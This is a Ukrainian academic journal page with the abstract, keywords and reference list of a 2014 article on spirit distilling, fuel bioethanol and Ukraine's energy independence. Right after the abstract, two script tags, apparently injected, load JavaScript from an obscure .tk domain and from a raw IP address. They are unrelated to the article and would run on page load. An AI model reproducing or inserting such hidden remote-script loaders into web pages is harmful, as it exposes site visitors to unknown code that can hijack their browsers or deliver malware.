ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.341
Зовнішньоекономічні відносини

Спиртове виробництво та енергетична безпека України / Олійничук С. Т., Коткова Н. С. // Економіка АПК. - 2014. - № 4 - С. 60

Питання енергетичної безпеки для України є головною умовою її існування як енергетично незалежної держави. Енергетика України значною мірою залежить від імпортованих енергоносіїв, серед яких особливе місце займають нафта, газ, бензин, дизельне паливо. Якщо враховувати, що ці ресурси не відновлюються та їхні природні запаси з року в рік постійно зменшуються, то настане такий час, коли видобуток викопних джерел енергії скорочуватиметься, а ціни в найближчій перспективі інтенсивно зростатимуть. Організація виробництва паливного біоетанолу для України є перспективним напрямом для зменшення енергетичної залежності від постачальників нафти й природного газу. Спиртова галузь має певну перспективу щодо нарощування обсягів виробництва і завантаження виробничих потужностей окремих спиртових заводів виробництвом біоетанолу після їх перепрофілювання. Табл.: 5. Бібліогр.: 25.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: енергетична безпека, спиртове виробництво, біоетанол, світове виробництво зерна кукурудзи, валовий збір кукурудзи, внутрішнє споживання кукурудзи, експорт кукурудзи

Список використаних джерел

 1. Державна служба статистики України. Статистична інформація [Електронний ресурс]. – Режим доступу: http://www.ukrstat.gov.ua.
 2. Дослідження Центру Avanzados в галузі прикладної економіки – CEPEA. Індикатор тижневого безводного етанолу [Електронний ресурс]. – Режим доступу: // http://www.cepea.esalq.usp.br/.
 3. Дубровін. В.О. Біопаливо (технологія, машини і обладнання) [Текст] / В.О. Дубровін, М.О. Корчемний, І.П. Масло та ін. – К.: ЦТІ «Енергетика і електрифікація», 2004. – 256 с.
 4. Економічна безпека України: сутність і напрямки забезпечення [Електронний ресурс]. – Режим доступу: http://old.niss.gov.ua/book/rozdil/binko.htm?
 5. Експерт технологічних процесів. Технологія спирту і допоміжні матеріали [Електронний ресурс]. – Режим доступу: //http://tpexpert.com.ua/?p=342.
 6. Єремєєв І. З 2014 року замість бензину імпортуватимуть біоетанол/ І. Єремєєв // Економічна правда [Електронний ресурс]. – Режим доступу: //http://ua-energy.org/post/37144].
 7. Іванов С.В. Організація виробництва паливного етанолу в агропромисловому комплексі України / С.В. Іванов, П.Л. Шиян [Електронний ресурс]. – Режим доступу: http://dspace.nuft.edu.ua/jspui/bitstream/123456789/9557 /1/35.pdf.
 8. Інформаційно-аналітичний бюлетень КМУ [Електронний ресурс]. – Режим доступу: // http://ru.info-kmu.com.ua/2013-10-04-000000pm/article].
 9. Калетнік Г.М. Виробництво біоетанолу із зернової сировини в Україні як ефективний шлях розвитку сільського господарства / Г.М. Калетнік, Н.В. Пришляк // Економіка АПК. – 2012. – №10. – С. 111–114.
 10. Калетнік Г.М. Економічна ефективність виробництва та використання біоетанолу в Україні / Г.М. Калетнік, С.Т. Олійнічук, О.П. Скорук // Зб. наук. праць ВНАУ. – Серія: Економічні науки. – № 1 (56). – 2012 [Електронний ресурс]. – Режим доступу: //http://econjournal.vsau.org/files/pdfa/491.pdf.
 11. Міжнародна Рада по зерну. Світовий ринок [Електронний ресурс]. – Режим доступу: http://igc.int/en/grainsupdate/sd.aspx?crop=Totalg.
 12. Міністерство аграрної політики та продовольства України. Доступ до публічної інформації [Електронний ресурс]. – Режим доступу: //http:// www.minagro.gov.ua/.
 13. Міністерство сільського господарства США (USDA) [Електронний ресурс]. – Режим доступу: http://www.usda.gov/wps/portal/usda/usdahome?navid=AGENCY_REPORTS.
 14. Ринок кукурудзи та продуктів її переробки [Електронний ресурс]. – Режим доступу: // http://www.agrotimes.net.
 15. Скорук О.П. Альтернативна енергетика України: перспективи розвитку / О.П. Скорук // Економіка АПК. – 2012. – №9. – С. 28–32.
 16. Україна займе місце серед світових лідерів-експортерів кукурудзи [Електронний ресурс]. – Режим доступу: http://www.zerno.org.ua.
 17. Федоришина Л.І. Аналітичне забезпечення управління та ефективності біотехнологій в Україні в порівнянні із зарубіжним досвідом / Л. І. Федоришина, Н. Д. Глазко // Зб. наук. праць ВНАУ. – Серія: Економічні науки. – №1 (56). – 2012 [Електронний ресурс]. – Режим доступу: // http://socrates.vsau.org/repository/getfile/6167.pdf.
 18. Цьогоріч Україна планує експортувати 16,4 мільйона тонн кукурудзи [Електронний ресурс]. – Режим доступу: http://svitagro.com.
 19. Шпичак О.М. Економічні проблеми виробництва біоетанолу та продовольча безпека України / О.М. Шпичак // Економіка АПК. – 2010. – № 8. – С. 11–19.
 20. США намерены снизить квоты на производство биоэтанола [Електронний ресурс]. – Режим доступу: http://www.fermer.org.ua/novosti/ssha-namereny-snizit-kvoty-na-proizvodstvo-bioyetanola-14669.html20.
 21. National Corn Growers Association. World of Corn [Електронний ресурс]. – Режим доступу: http: www.ncga.com/worldofcorn.
 22. USDA Livestock, Poultry & Grain Market News «National Weekly Ethanol Summary» Fri, Nov 01 [Електронний ресурс]. – Режим доступу: http://www.ams.usda.gov/mnreports/lswethanol.pdf.
 23. Dornbusch R. and William R. Cline. Brazil's Incomplete Stabilization and Reform // Brookings Papers on Economic Activity. 1997. – № 1. – P. 367–404.
 24. Hanna L., Kay J.A. Concentration in modern industry: theory, measurement and the UK experience. – London: The Macmillan Press, 1977. – № 1. – P. 52–55.
 25. Lazonick W. Learning and the Dynamics of International Competitive Advantage // Enterprise  Society. 2002. – V.3. – № 1. – P. 35–54.
 26. Peltzman S. Stigler G.J. // Henry W. de Jong, William G. Shepherd, eds. Pioneers of Industrial Organization: How the Economics of Competition and Monopoly Took Shape. – Cheltenham: Edward Elgar, 2007 – P. 239–244.
Читати статтю: 14_04_60-64.pdf
Читати переклад статті: 1404oliinychyk_kotkova.pdf